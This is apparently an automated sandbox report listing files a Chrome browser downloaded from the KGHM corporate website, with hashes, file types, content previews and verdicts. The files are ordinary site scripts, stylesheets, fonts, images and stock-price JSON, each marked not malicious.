                                          Preview:((s,r,e)=>{r.behaviors.search={attach(l){s(e("search",".search-button",l)).click(a=>(s(".search-flex").slideToggle("slow"),s(a.target).parent().find(".search").toggle(),!1)),s(e("search","#views-exposed-form-solr-search-content-block-1 .form--inline",l)).after('<button class="close-search">x</button>'),s(e("search",".close-search",l)).click(a=>(s(a.target).closest(".search-flex").slideToggle("slow"),!1)),s(e("search","a.tool-toggle",l)).click(a=>{const t=s(a.target).attr("href");if(s(t).slideToggle(),s(a.target).hasClass("active")||s("html,body").animate({scrollTop:s(t).offset().top},"slow"),s(a.target).toggleClass("active"),s(a.target).siblings("a.tool-toggle").hasClass("active")){s(a.target).siblings("a.tool-toggle").removeClass("active");const o=s(a.target).siblings("a.tool-toggle").attr("href");s(o).slideUp()}return!1}),s(e("search",document,l)).mouseup(a=>{const t=s(".block-search");!t.is(a.target)&&t.has(a.target).length===0&&s(".search-flex").slideUp("slow")})}}})(jQuery,Drupal,
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text
                                          Category:downloaded
                                          Size (bytes):271751
                                          Entropy (8bit):5.0685414131801165
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:6A07DA9FAE934BAF3F749E876BBFDD96
                                          SHA1:46A436EBA01C79ACDB225757ED80BF54BAD6416B
                                          SHA-256:D8AA24ECC6CECB1A60515BC093F1C9DA38A0392612D9AB8AE0F7F36E6EEE1FAD
                                          SHA-512:E525248B09A6FB4022244682892E67BBF64A3E875EB889DB43B0A24AB4A75077B5D5D26943CA382750D4FEBC3883193F3BE581A4660065B6FC7B5EC20C4A044B
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://code.jquery.com/jquery-3.3.1.js
                                          Preview:/*!. * jQuery JavaScript Library v3.3.1. * https://jquery.com/. *. * Includes Sizzle.js. * https://sizzlejs.com/. *. * Copyright JS Foundation and other contributors. * Released under the MIT license. * https://jquery.org/license. *. * Date: 2018-01-20T17:24Z. */.( function( global, factory ) {..."use strict";...if ( typeof module === "object" && typeof module.exports === "object" ) {....// For CommonJS and CommonJS-like environments where a proper `window`...// is present, execute the factory and get jQuery....// For environments that do not have a `window` with a `document`...// (such as Node.js), expose a factory as module.exports....// This accentuates the need for the creation of a real `window`....// e.g. var jQuery = require("jquery")(window);...// See ticket #14549 for more info....module.exports = global.document ?....factory( global, true ) :....function( w ) {.....if ( !w.document ) {......throw new Error( "jQuery requires a window with a document" );.....}.....return factor
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (65463)
                                          Category:downloaded
                                          Size (bytes):140004
                                          Entropy (8bit):5.199905348166027
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:11B5A856B0B28D26AAC97E804DEF3551
                                          SHA1:032D624CA36B3764267CAACB3C15B0981C363F50
                                          SHA-256:06B567BF9157F82E348667A0A14587F88C5CC6459A391BF483AB9126D34A80C9
                                          SHA-512:7B3EA585DEABB13FD68D457FD8B7CF450762A822E78E86359D33BA513283BBBC76A5F6947712F7309F190F1DD4F5D9B7B67F89CEE2908E44B03C66D7E366A4CB
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/sites/default/files/css/css_r5ZlJO07zE-2BLMDplgfF1efChpGFQNAF9OiaRLstq0.css?delta=2&language=pl&theme=kghm&include=eJx1UWtaAyEMvBAsR-LLQgq4QJCAdT29lG2rtfUPTGbyDljbCPKu4AqWU6XcBO_cMKkVGIWJwLw_4ITM4JCFoYoqU00QwxeKzfmkXKQVouS2x5DdA_fGh-mpyUS2R5QVSwSDCUdV7NoQbQHHl0oMkA2qV6S2eIIem0js9Nt7x7rrkQ-iOgw5jdsUB7ccWUSBCq5C8axs7QXi8sMsPZe-xsAe7dHpXZPyhNB6RSvHWJs8h-ZlSHMLfz1biFdWcyOzafw0HrJD1XxFlIZiT_k57l5hJpAcg8X65JUg5Jt2vUcmi6KtOqGDsck-6oyNLr8YkWgdSfVUDywvWIJpgUYvD_qMmP2XMaBuRJHVfO_-r6ajjJfloPgIeGY13-W4s2CEaryGEjT0EXa5JTZU__DfRKwCYg
                                          Preview:/* @license GNU-GPL-2.0-or-later https://www.drupal.org/licensing/faq */..tb-megamenu .clearfix{*zoom:1;}.tb-megamenu .clearfix:before,.tb-megamenu .clearfix:after{display:table;content:"";line-height:0;}.tb-megamenu .clearfix:after{clear:both;}.tb-megamenu .hide-text{font:0/0 a;color:transparent;text-shadow:none;background-color:transparent;border:0;}.tb-megamenu .input-block-level{display:block;width:100%;min-height:30px;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;}.tb-megamenu .row{margin-left:-20px;*zoom:1;}.tb-megamenu .row:before,.tb-megamenu .row:after{display:table;content:"";line-height:0;}.tb-megamenu .row:after{clear:both;}.tb-megamenu [class*="span"]{float:left;min-height:1px;margin-left:20px;}.tb-megamenu .row-fluid{width:100%;*zoom:1;}.tb-megamenu .row-fluid:before,.tb-megamenu .row-fluid:after{display:table;content:"";line-height:0;}.tb-megamenu .row-fluid:after{clear:both;}.tb-megamenu .row-fluid [class*="span"]{display:block;width:100
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1200x801, components 3
                                          Category:downloaded
                                          Size (bytes):125998
                                          Entropy (8bit):7.986339603178766
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:0D2116AA098D9B3DB21A8C659F1B5AC0
                                          SHA1:8EEC357515927314AFCAD0BF44B391137D74DBC1
                                          SHA-256:BD815863A7A31B0D850658AAF58D47104A2CE49DBAAB397342984B5EC58E5EDB
                                          SHA-512:F072A3E047FDC93F0D8581A1E99EE9585256DD3C9966D39F68D4E6EB43D66C2800E7680705662A9A189DDA7BFA1731120BF0D15A4F5CB5B36AE36E4F18A6AF6C
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/sites/default/files/2024-02/kghm_dolacz_do_nas_4_0.jpg
                                          Preview:......JFIF.............C....................................#,%.!*!..&4'*./121.%6:60:,010...C...........0 . 00000000000000000000000000000000000000000000000000......!.......................................................................................H."J... @....$...4.....Ig..A.;.s_L`..... @.J.e......E.f.gG.2C...9}YT.....$4'U.......$..6.t..485C.:.b. @...'w..en6.......3.s[L.P.p...:e.mg....9.$.)&|....B..M[.....vrv....0..9b....9R.D..:)uC...`...4U.B...H!K....@.aE..... @..........M.$...6Yp.t".mf........ @.J.g....qht...l..,.I.._I........IU.mu..>m....{M}d...I....&... `"...g.p$....D.fE.i5..u......:...U.....,t.l..eV3s.:Wp..4T.,.X..s..s.,.....hut.%..-:!K3.0........D+B.T.E_UC.8.{......... @.......7!.s.<;9Q!...v.c.)Q. i.......IQ...Z.H1..ni..A....uv.?C.;.4...J.y.....T.EN..M}RC....g..W\b.... ....s.<T..P..L.`..I..0......C.0..4..7).".h..c&..]..........Sg*..Y....).)t#C$9!.[Y.=L.m;.7..qht.j...3.kj.G;..&E.M..3L$.. @.....rL...X....R ..i.&..9..W.8.@...7..N.{\....hl..'c".4XrFwT`.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 800x800, components 3
                                          Category:downloaded
                                          Size (bytes):287246
                                          Entropy (8bit):7.978028560752559
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:2D76E5474C8E3EEFF853B3CF91CD27BF
                                          SHA1:55AEF30DBC8C907FA4B5462D097FFE5A2D5ABB89
                                          SHA-256:4289026B3915F3AE34CE97086D97F824C004F8E75EAC758E9F665D2E31C5BAB2
                                          SHA-512:643247E5473932F805800556194BB3B7DB7E123F7D4471AFE83EB22900097B431B508F13D394B1BE3E0691E5410A1ACBBFCEBAF5E3B95ED8D5B435C92B0C8B44
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/sites/default/files/2024-01/uwazaj_na_internetowych_oszustow_0.jpg
                                          Preview:......Exif..II*.................Ducky.......d......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="3A426ACC58A00A74A544505B9EC584C8" xmpMM:DocumentID="xmp.did:6706F87026F311EE96C4FF0CE64120CC" xmpMM:InstanceID="xmp.iid:6706F86F26F311EE96C4FF0CE64120CC" xmp:CreatorTool="Adobe Photoshop 24.6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:aeb84710-549f-cf43-aaf9-c02278f557f2" stRef:documentID="adobe:docid:photoshop:dbe67038-134f-8240-a01d-0b81caf90963"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...........................................
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Web Open Font Format (Version 2), TrueType, length 13224, version 331.-31196
                                          Category:downloaded
                                          Size (bytes):13224
                                          Entropy (8bit):7.985755863286031
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:B91D376B8D7646D671CD820950D5F7F1
                                          SHA1:13517529AFFA39E2585C591ACAE6DC336B6AA917
                                          SHA-256:E42A88444448AC3D60549CC7C1FF2C8A9CAC721034C073D80A14A44E79730CCA
                                          SHA-512:80D50B0CF7D064332A0C8E7D9F2E294F1ABED15C47644CB04B92B785AF4601B683CFD3C668C0EF31DEE342840063E0C395AE453650184971BA984EC8ECD3223A
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/webfonts/fa-regular-400.woff2
                                          Preview:wOF2......3...........3N.K.$....................?FFTM....`..Z.....\..".6.$..T..6.. ..[..+..ie......q.&...Jf....1D"A.Z?D..d...U.C...}.>.Yk7.........v..."LM....7.....t.........V..6.`.C..j...rD.?{HR4...h..myc-.Ya.E...F.......3D...n.M#!.I$..-!&.E0.Pz .RC1A..i.Q.B..`9D<....lw......b...Z.=\...T%1.<.>....B.B..!..~.+.I'....')..(.)k......ab.......iR...B..5,$-..F....{.W...|G_2$l{..^.:..EXte}0..}..^....-...r$;...o`.9O..".................y............3.}.`...._i8.S./......_....Ux..&~.0..Z.Y6....^.7....(........X....I.'.f....=.a.a.q......7.\T.R.B..}W..J..ms.S.i{tW.$.`......n.."".x.c.>>. sZ.Z.S...*..{.'D... .^.........tu#......AB...........Fv.{....t...c.<...[.Z?.]x..F.+X0.i.Q.;&6}a%.7>.n..[....p..H......2..'..>..Z.YF+]...Oq...\.)..?G.y.T.c.I.i2..v../..U...o.=.R...WAu-muk.k...T7{...{.'...~..._..[.5..}..;....g..".....<.tn.T..../..5.j.eIM..{....e.r.Z......#h?..K?....a.......}..^.v:.9.....l...F.......^......jw...ZZ.e/[Y...j..T<...?.....;.}...=.....~J.e1%..
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 804 x 383, 8-bit colormap, non-interlaced
                                          Category:dropped
                                          Size (bytes):79265
                                          Entropy (8bit):7.965298467769636
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:49EE17D655903D0A6C537C884C081391
                                          SHA1:B2C132902E6DD958BC17087146C6ECCC41836BB7
                                          SHA-256:B8EBB93A1D5145AA3B163ABEAC1A7D7902B1EB248D52CA416477DA170F057419
                                          SHA-512:4C5A2743C3FEE1671F4ED2980A9E38BD0C4A395F166DE53B5A33BB97AB51144B33853A30EC8D998C30CB42D1300EDF4B1F5E86D655622218B4C665867393EB49
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:.PNG........IHDR...$............+....sRGB...,.....PLTE...oO=pO=oO<pP=qP=tR?rQ>qP>.[F.cLsR?.bK{XCrQ?zWC.\G.[F.\F.\G.]H.^H.^H._I._I.`J.aJ.aK.cL.dM.eM.eN.jR.gO.dM.fN.eN.fN.fO.gO.gP.hP.`J.aK.bL.kR.iQ.jQ.dL.lS.ZE|XD}XD}YD~YE.iQ.`PuS@.iP.`@wUAxUByVB.]G.hP.[EzVB{WC~ZE.jQ.kS.`IvT@xUAtS?wTA._InN<vTA.]G.kR.lSzWB.`P.\c}...TtRNS......................................................................................K...3.IDATx....CZ...}bk....5.l6{`....7>....t.z..wy..P..vm.~.[..8"......K.....K..k..............+..e....QK_.G?....V.R.demM._.VW...Z.Z..;.?]x.K_.._.....Z....k|.....Vekkk..../....z.QS.J...j."........|.(...N..$..^.D.^.....,.)Y..yT....v.n.1.....n....z4l....w....}......(V.B-...\....V....S..B.N.Z.J...6..QVU.=.....c.......V..o5..&..sLNOO..M_..g.z.Z.....W^.../...%....].|...{,...k.....].......>...k......y.Mo.UCJ..UdD..........k..._..........7CM..zD..Ol.).[.q2... 9:.....#j!$D..!.*J.EH4Lj...D....q.<..7._.n.a...v., .x........C...x.D.c....o. I[S.H.._L.4...$.$$.{u.5.ZR.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (371)
                                          Category:downloaded
                                          Size (bytes):372
                                          Entropy (8bit):5.031775565560654
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:767017A48F89A8D42C37714F88875F9C
                                          SHA1:D2CF6BB2EF0233F709EA5FFA642BC618D8AEFD6D
                                          SHA-256:7C80625DC0AB4346A3221BC82B06DC87948E6FB0A40791125FC6A0E5191C1452
                                          SHA-512:A7E9B819EC6B91F056CC33CAE0AEF8738AA9695BADC6E687DC0AC038FF348C1B6DF13AC23F0306D48747EB66C0F1A1947B5A218A23F99FF267D6E89970692DFE
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/themes/custom/kghm/dist/assets/js/tiles-slider-Kkz2s3zF.js?sm23fd
                                          Preview:((e,s)=>{s.behaviors.tilesSlider={attach(){e(".paragraph--type--featured-tiles .field--name-field-paragraph").not(".slick-initialized").slick({infinite:!0,slidesToShow:3,slidesToScroll:1,dots:!1,arrows:!0,autoplay:!1,responsive:[{breakpoint:800,settings:{slidesToShow:2,slidesToScroll:1}},{breakpoint:500,settings:{slidesToShow:1,slidesToScroll:1}}]})}}})(jQuery,Drupal);.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (52011)
                                          Category:downloaded
                                          Size (bytes):1048843
                                          Entropy (8bit):4.7784006276377085
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:1859D3C29B6D01C25C5770A735C7D107
                                          SHA1:9EA79FCDB816C4C6A9064F6EF0DAAC87EB155E37
                                          SHA-256:EC1623B0E49E5795D62E6BDF7A849905499A475080EEDBB8389096F9F9B8938D
                                          SHA-512:CA27A3E9F1F67D16D6E79A2BAACD861428950CE882AFAB8A16025A063D5452C20495659056FC0EBF820BBCBE3EA79CB08A5CFABF923B9E1D02BCF0D6B02D07E6
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/sites/default/files/css/css_hwoCFhJW3E5p9M23bBLI9WXSa2zlFpDezds3NcDS2rM.css?delta=3&language=pl&theme=kghm&include=eJx1UWtaAyEMvBAsR-LLQgq4QJCAdT29lG2rtfUPTGbyDljbCPKu4AqWU6XcBO_cMKkVGIWJwLw_4ITM4JCFoYoqU00QwxeKzfmkXKQVouS2x5DdA_fGh-mpyUS2R5QVSwSDCUdV7NoQbQHHl0oMkA2qV6S2eIIem0js9Nt7x7rrkQ-iOgw5jdsUB7ccWUSBCq5C8axs7QXi8sMsPZe-xsAe7dHpXZPyhNB6RSvHWJs8h-ZlSHMLfz1biFdWcyOzafw0HrJD1XxFlIZiT_k57l5hJpAcg8X65JUg5Jt2vUcmi6KtOqGDsck-6oyNLr8YkWgdSfVUDywvWIJpgUYvD_qMmP2XMaBuRJHVfO_-r6ajjJfloPgIeGY13-W4s2CEaryGEjT0EXa5JTZU__DfRKwCYg
                                          Preview:/* @license MIT https://github.com/necolas/normalize.css/blob/3.0.3/LICENSE.md */.html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;}body{margin:0;}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block;}audio,canvas,progress,video{display:inline-block;vertical-align:baseline;}audio:not([controls]){display:none;height:0;}[hidden],template{display:none;}a{background-color:transparent;}a:active,a:hover{outline:0;}abbr[title]{border-bottom:1px dotted;}b,strong{font-weight:bold;}dfn{font-style:italic;}h1{font-size:2em;margin:0.67em 0;}mark{background:#ff0;color:#000;}small{font-size:80%;}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline;}sup{top:-0.5em;}sub{bottom:-0.25em;}img{border:0;}svg:not(:root){overflow:hidden;}figure{margin:1em 40px;}hr{box-sizing:content-box;height:0;}pre{overflow:auto;}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em;}button,input,optgrou
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 19 x 19, 8-bit colormap, non-interlaced
                                          Category:downloaded
                                          Size (bytes):595
                                          Entropy (8bit):6.519283567728687
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:43DE7315062277247D54E1F3EC875252
                                          SHA1:75A605BE5A12ADEC77A1260C74A64DF9207BA30F
                                          SHA-256:696A59058BB79E0F0370622D684A6F99AD200098ACC92DD967A38D9B536118CC
                                          SHA-512:3A451DDC0EF86E87B6282FA46F073A87FB57BD93D4977152B5DF324696484944607B39726B1B0130F339FFD58D3D1E53FEE870030E8954DF6AE7DBD8310AF263
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/themes/custom/kghm/images/tool-icon--search.png
                                          Preview:.PNG........IHDR.............E.......sRGB...,.....PLTE.............................................................................................................................................................................................................................................|.:P...OtRNS.!t...p..........B,E..... &.)...$...{.5A..(..6....x...."..F0H....s..o........`.1.....IDATx.m....0.....K.E.Cqwww...$.t.}.;g3I...Lf..fw.O9].^%..7I.xe.?.T.zc..(mbq.....L.Ms..7...,..[.e....UQ.YG.p.I...n.t..T.SL.x;.p.n.c.?-............8....p<...K....U....;...c........Z.....IEND.B`.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JSON data
                                          Category:downloaded
                                          Size (bytes):99
                                          Entropy (8bit):4.387377155009055
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:C720117F2A7A7BFA24D8B58BE11FB09C
                                          SHA1:51CA7469B407B70F81049CA5D3443FA956B78FA9
                                          SHA-256:6FD71314C9D723F03D22EC5DCD2176091FC51C262CE50129E473A97D66A7E4D1
                                          SHA-512:DBD603D001B47EB13F48EDEB5E3DD45C373755BA0CADAB18412806DDDD40C16AE91E55B86A6403005DEBCC1375926F12B22AC6AEC7B0C29B067A2990910EE8E4
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/pl/kghm-stock-exchange/small
                                          Preview:{"KGHM":{"title":"KGHM","change":"-0.10","price":"155.10","time":"10:42:24","date":"28\/10\/2024"}}
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1920x875, Suserng: [none]x[none], YUV color, decoders should clamp
                                          Category:dropped
                                          Size (bytes):22382
                                          Entropy (8bit):7.949369263230155
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:DACB35CEA217D4B258B3AB5D9FE01AFC
                                          SHA1:FF65308A5D2BA92F69F4A6CC3D38A73B9E2D5FEC
                                          SHA-256:67C5CBECBFDD67915999579F4456FCA075D4BE1AA1EA3B7CEDB905415FD1BE0F
                                          SHA-512:E5E3B7B2523893D1850463DA0A9627D0E721DE0F469FDBB0D57BEABF18C435B79989B20A04045CD5737938E3692150D7BF5CE74F8BE2CEC5DD8FB27D7F71735E
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:RIFFfW..WEBPVP8 ZW.......*..k.>m6.I$&(""......gn....T.R.aW..f../....!s.-5........^..}.........v.s8.ox......../.A.7.OJ.......k........S.^...#.S...#.o.....g..........m..}..u.j...W.........5.q..^....+.>....C...^.SS..P/.......c......".xD............/p^..{......../p^..{......../p^..{......../p^..{......../p^..{......../p^..{......../p^..{......../p^..{......../p^..{......../p^..{......../p^..{......../p^..{......../p^..{......../p^..{......../p^..{......../p^..{......../p^..{......../p^..{......../p^..{......../p^..{......../p^..{......../p^..{......../p^..{......../p^..{......../p^..{......../p^..{......../p^..{......../p^..{......../p^..{......../p^.{.....=.....-....f.`....{...U..../{....v{.c8%.rZ6.WN.r.g...KF..O...._...{......../p^..{........Vx.,........s7e>..h)T....x,....g........7Y....];.Z.."3z.7l^.m..OT.....H.... ..[.....1e....../p^..{......../p^....!g.{....Jh..!.j...lP3.[.y....n*.......'...Q1...d<"..Y~........./p^..{.......vG....
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (59119)
                                          Category:downloaded
                                          Size (bytes):59305
                                          Entropy (8bit):4.716988765402807
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:ECD507B3125EDC4D2A03AA6AE5D07DA9
                                          SHA1:A57EE68D11601B0FD8E5037FC241FF65A754473C
                                          SHA-256:99464CEB71BC9BBDCC72275FAEFE44F98EB5CBB6B5D8EE665B87B35376F1A96E
                                          SHA-512:D72727E8871A410E34FCC2815B65B84618ACFC36C82D4EF80B5BD2ACB2710AAE7BA3DE35626D354B036C38CAAF10116572051AEB12E23D8FCD4B947E13ACED25
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/css/all.min.css
                                          Preview:/*!. * Font Awesome Free 5.15.4 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */..fa,.fab,.fad,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pu
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (1718)
                                          Category:dropped
                                          Size (bytes):1807
                                          Entropy (8bit):5.297247601561959
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:299DBBE2C93ADF51B8D58ABD1DA76C88
                                          SHA1:3E39FEC2870CF51CCC3D7697BC03DD8369BC7DF7
                                          SHA-256:6FDBBD849D3751862235CEF68A282DB558ECA6E3E2CA10BF26929486F1186F55
                                          SHA-512:52A9653611E18AB83F8274B7EA9DBA644FD06F0C3954A25A15DF701ECB4D7F2FFB0B7FEEE8221209F0AB6CFB52599B4B9090AACC8E51D76E7541E8A25CD47B6F
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:/* @license MIT https://raw.githubusercontent.com/js-cookie/js-cookie/v3.0.5/LICENSE */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self,function(){var n=e.Cookies,o=e.Cookies=t();o.noConflict=function(){return e.Cookies=n,o;};}());}(this,(function(){"use strict";function e(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var o in n)e[o]=n[o];}return e;}var t=function t(n,o){function r(t,r,i){if("undefined"!=typeof document){"number"==typeof (i=e({},o,i)).expires&&(i.expires=new Date(Date.now()+864e5*i.expires)),i.expires&&(i.expires=i.expires.toUTCString()),t=encodeURIComponent(t).replace(/%(2[346B]|5E|60|7C)/g,decodeURIComponent).replace(/[()]/g,escape);var c="";for(var u in i)i[u]&&(c+="; "+u,!0!==i[u]&&(c+="="+i[u].split(";")[0]));return document.cookie=t+"="+n.write(r,t)+c;}}return Object.create({set:r,get:function(e){if("undefined
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):235
                                          Entropy (8bit):4.389791051665597
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:91790812E5AD458EF29EFFE882A00D3D
                                          SHA1:42CEB58C238385CFE931AD8F906EA15E0E1F2920
                                          SHA-256:7D054D7F137D210B6C3D07C30D1704A83140310BDB25C2171B99AB62A72FE56E
                                          SHA-512:E7354725B4CFBAF590045F372100301C453D67AF3450B1F738BE8C90AFC55E93A6B527DE9FA56265F41908CD0FFC53A129598BDCAFD195514E571297F9E53DAC
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:{"KGHM":{"title":"KGHM","change":"-0.10","price":"155.10","time":"10:42:24"},"WIG20":{"title":"WIG20","change":"0.69","price":"2,260.71","time":"10:57:45"},"WIG30":{"title":"WIG30","change":"0.65","price":"2,864.30","time":"10:42:00"}}
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 380x241, Suserng: [none]x[none], YUV color, decoders should clamp
                                          Category:dropped
                                          Size (bytes):23238
                                          Entropy (8bit):7.99252486057644
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:6E66AAD49BCF5F6BED63B2857DC56DA1
                                          SHA1:E3F272B5EB05515F31F5D77F9948DC19541D8E01
                                          SHA-256:A8A6097644D3B1053FC40D2CEC99E67CE4F612DC1CFBCF4D348CCC18AC69EE8D
                                          SHA-512:DD609C36E96ABE1F2A2EA785C45D72527CB526DD78D5C20B32DC5E4ED0E92FB51F0E033D32ABA90872BFDB8183EF90883198DD280DB317D117DBFE313DC577C5
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:RIFF.Z..WEBPVP8 .Z.......*|...>i(.E."!.mu.@...6.&^...!.....]._.....v'.<.....X..}D?.z&...o.c.....?..P..>.....~s~.....9../.~....3.+}~.[.7.?.>........_L{.{?....k.2._......3....D>...y3...k...}.._z........>..v...,..,*?b<K.)...r.......K.....s.P.......V]zr.y.3....$..>b..A!s.~O.(yv....FQ?:.7x...Z..%SA$.2..A......[<...kV;....f...O......y...jCA.2...qi.G1kYcRb......V...87......,z4..I..X...|.;..8+.....yY..9.l$^.6V..d7R.b.|...<.2....].._.G.H.............#.R.2...D..D.p..'...].k........6*;.}.W.......k.Tk...e........x._...o..xQ:8.M..s.-$ZUR..<t.GQ7{..T......\.....4P..LPB.N...*/..x.KI.W1_....Wb....{./f.1...+5W+o.^......3^...9....+.....c6......MA.A>.=...c...z.^..S.......F0H........U.n....Hf...K.n.=._.\.hf.-u.F`....u.u$....wu..p:..R..fy..e.BC.T...7.......X... ..'......zD..]Y....y:.8.......k.7...K..{....Ae.~..n..rT..O.Q%...r...x..c..M..k}...Q.8...f....M".>.,..+.#r........6....0?_.s.d...I.({.).9;aW..8..Jl.......C.........O...Rx..w..s.......0.....e..
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JSON data
                                          Category:downloaded
                                          Size (bytes):772
                                          Entropy (8bit):4.8172969941717145
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:66601F26CE4ECFAEE6325A77BC70BD6B
                                          SHA1:692FED08453E86156EF016C918F9A4B09C73FD41
                                          SHA-256:AB3B03E3D7C1DB1FA03E6D1A2DF9503843E2E502673C56B25A0BEF08FABE9F65
                                          SHA-512:1DB1219822BFCC22DED1DD47E476EE063931A2B92411E6A1536E59C63C4B7E91791BAEC5B9F2A90F1DCC794AEC0D517BA778D0111008D1DD01B32AF083ECB7F9
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://ipapi.co/json/
                                          Preview:{. "ip": "155.94.241.188",. "network": "155.94.240.0/22",. "version": "IPv4",. "city": "Dallas",. "region": "Texas",. "region_code": "TX",. "country": "US",. "country_name": "United States",. "country_code": "US",. "country_code_iso3": "USA",. "country_capital": "Washington",. "country_tld": ".us",. "continent_code": "NA",. "in_eu": false,. "postal": "75247",. "latitude": 32.8137,. "longitude": -96.8704,. "timezone": "America/Chicago",. "utc_offset": "-0500",. "country_calling_code": "+1",. "currency": "USD",. "currency_name": "Dollar",. "languages": "en-US,es-US,haw,fr",. "country_area": 9629091.0,. "country_population": 327167434,. "asn": "AS8100",. "org": "ASN-QUADRANET-GLOBAL".}
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 380x241, Suserng: [none]x[none], YUV color, decoders should clamp
                                          Category:downloaded
                                          Size (bytes):21064
                                          Entropy (8bit):7.99081903386354
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:422E9CCAD9751BBC599BE3FC7226C6A4
                                          SHA1:C6A7C774A794EAE069B20EA57F645B743A5C8330
                                          SHA-256:82482EC661E3EE29DAE103DE61F80BDA9A8F80D278634831FBF4CAF41FE2F8E1
